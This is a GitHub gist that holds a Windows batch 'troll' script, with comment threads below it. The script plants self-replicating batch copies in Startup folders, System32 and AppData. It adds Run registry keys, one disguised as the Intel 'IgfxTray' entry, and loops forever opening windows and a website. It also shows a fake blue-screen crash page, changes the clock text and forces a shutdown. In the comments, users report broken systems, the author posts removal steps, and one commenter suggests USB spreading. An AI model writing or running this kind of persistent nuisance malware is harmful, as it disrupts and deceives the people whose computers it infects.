Skip to content

Instantly share code, notes, and snippets.

@Albirew

Albirew/YOLO.bat

Last active Dec 30, 2020
Embed
What would you like to do?
evolution of a "harmless" troll batch file (see revisions)
@echo off
:: YOLO v4 - ARMAGETROLL
set troll=%random%%random%.bat
cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
echo @echo off > %troll%
echo setlocal ENABLEDELAYEDEXPANSION >> %troll%
echo set troll=%%random%%%%random%%.bat >> %troll%
echo set lol=0 >> %troll%
echo :pwn >> %troll%
echo set /a lol=%%lol%%+1 >> %troll%
echo set /a variable=%%lol%% %%%%2 >> %troll%
echo if !variable! EQU 0 (color eb) else (color be) >> %troll%
echo start http://imswinging.com/ >> %troll%
echo start notepad.exe >> %troll%
echo msg * NORAJ! >> %troll%
echo start mspaint.exe >> %troll%
echo start explorer.exe >> %troll%
echo start cmd.exe >> %troll%
echo copy %%0 "%%appdata%%\%%troll%%.bat" >> %troll%
echo copy %%0 "%%windir%%\System32\%%troll%%.bat" >> %troll%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v YourOwnLifeOrganizer /t REG_SZ /d "%%appdata%%\%%troll%%.bat" >> %troll%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v IgfxTray /t REG_SZ /d "%%windir%%\System32\%%troll%%.bat" >> %troll%
echo copy %%0 "%%appdata%%\Microsoft\Windows\Start Menu\Programs\Startup\%%troll%%.bat" >> %troll%
echo copy %%0 "%%allusersprofile%%\Microsoft\Windows\Start Menu\Programs\Startup\%%troll%%.bat" >> %troll%
echo start "%%appdata%%\Microsoft\Windows\Start Menu\Programs\Startup\%%troll%%.bat" >> %troll%
echo start "%%allusersprofile%%\Microsoft\Windows\Start Menu\Programs\Startup\%%troll%%.bat" >> %troll%
echo GOTO pwn >> %troll%
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application >> bsod.hta
echo applicationname="BSOD" >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>Un probleme a ete detecte et Windows a ete arrete afin de prevenir tout dommage sur votre ordinateur.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQ_NOT_LESS_OR_EQUAL^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Si vous voyez cet ecran d'erreur d'arret pour la premiere fois, redemarrez votre ordinateur. Si cet ecran apparait encore, suivez ces etapes:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Recherchez tout virus sur votre ordinateur. Supprimez tout disque dur ou controleur de disque dur nouvellement installe. verifiez votre disque dur afin de vous assurer qu'il est correctement configure et termine.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Executez CHKDSK/F pour verifier la presence d'un dommage sur votre disque dur puis redemarrez votre ordinateur.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Informations techiques:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" "bsod.hta"
reg add "HKCU\Control Panel\international" /v s1159 /t REG_SZ /d "YOLO BatchMan" /f
reg add "HKCU\Control Panel\international" /v s2359 /t REG_SZ /d "YOLO BatchMan" /f
reg add "HKCU\Control Panel\international" /v sTimeFormat /t REG_SZ /d "HH:mm tt" /f
timeout 5 >nul
shutdown /p
@NosabeYT1

This comment has been minimized.

Copy link

@NosabeYT1 NosabeYT1 commented Dec 7, 2019

How can I return my watch to normal?

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Dec 8, 2019

watch?
if you're asking how to remove yoloV4 from your computer, you need to:

  • boot in fail safe mode
  • delete all bat files located in %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
  • delete all bat files located in %windir%\System32\
  • delete all bat files located in "infected" user's %appdata%
  • delete all bat files located in %allusersprofile%\Microsoft\Windows\Start Menu\Programs\Startup\
  • start regedit and delete these keys if they're pointing to a bat file:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YourOwnLifeOrganizer
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IgfxTray
@boriswagemans

This comment has been minimized.

Copy link

@boriswagemans boriswagemans commented Feb 20, 2020

Please don't do this. I did it and now my computer is fucked up. If you don't want a fucked up computer please DON'T do this!!

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Feb 21, 2020

see above post to remove it, but seriously, why in the world would you start a troll file found on the internet on your own volition?
Did someone linked this file saying it was a cure to whatever virus or something?

@boriswagemans

This comment has been minimized.

Copy link

@boriswagemans boriswagemans commented Mar 2, 2020

No i just thought it was a normal batch file but i didn't knew it installed shit in my system

@Kyruhs

This comment has been minimized.

Copy link

@Kyruhs Kyruhs commented Sep 22, 2020

Never use this I messed up my whole computer the only way to delete this is to go into safe mode or fully reset your computer it will corrupt your backups token and your files would not recommend if you need help add Ky#4755 on discord

@coolbossinator

This comment has been minimized.

Copy link

@coolbossinator coolbossinator commented Sep 22, 2020

You dont even know what your talking about khyrus

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Sep 22, 2020

dunno if i should be amazed or ashamed that in 2020, people would still launch some unknown program found on the internet without knowing what does or even checking comments to see if safe or not...

edit: @Kyruhs don't forget the diseases it brings and the way it was used on sept 11...

@coolbossinator

This comment has been minimized.

Copy link

@coolbossinator coolbossinator commented Sep 22, 2020

What is the main purpose of this (besides the nice fake BSOD)?

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Sep 22, 2020

actually, the fake BSOD is just an excuse for reboot (and to learn batch escape characters)
script was made at first to punish students who go to smoke without locking their computer (i was an IT teacher at that time)
finally, some students evolved it (see code revisions) to make this "armagetroll" version. it was so beautiful that i kept it here. tehee 😜

@coolbossinator

This comment has been minimized.

Copy link

@coolbossinator coolbossinator commented Sep 22, 2020

I did not know you were a teacher. That's PURE GENIOUS. You should have tried to make it USB spreadable so it's even easier and all you had to do was just plug in a USB drive. But still, it must have been funny watching students come back to find their computer has a 'virus'.

@Kyruhs1

This comment has been minimized.

Copy link

@Kyruhs1 Kyruhs1 commented Sep 25, 2020

What do you mean "don't forget the diseases it brings and the way it was used on sept 11..."

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Sep 25, 2020

oh, that was maybe too subtle. i mean this script CANNOT in ANY FUCKING WAY corrupt tokens and files (i mean: what it does is wrote in clear text before the eyes of everyone). If it could, it means it have self-evolved, injected itself in living being creating a bizarre living/binary virus that could infect animals, and at he peak of it's existence, would have even returned to the past to infect planes to self-destruct at 9/11...

@coolbossinator

This comment has been minimized.

Copy link

@coolbossinator coolbossinator commented Sep 27, 2020

That was wayyyy to confusing to decode

Something as specific requires some context

@Albirew

This comment has been minimized.

Copy link
Owner Author

@Albirew Albirew commented Sep 27, 2020

well...
everything before empty line is troll batch file creation using escape characters (double percent gives unprocessed simple percent)
almost everything after empty line is just an html webpage created then started fullscreen
last 5 lines should replace AM/PM near clock with custom text and reboot machine
something like this?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.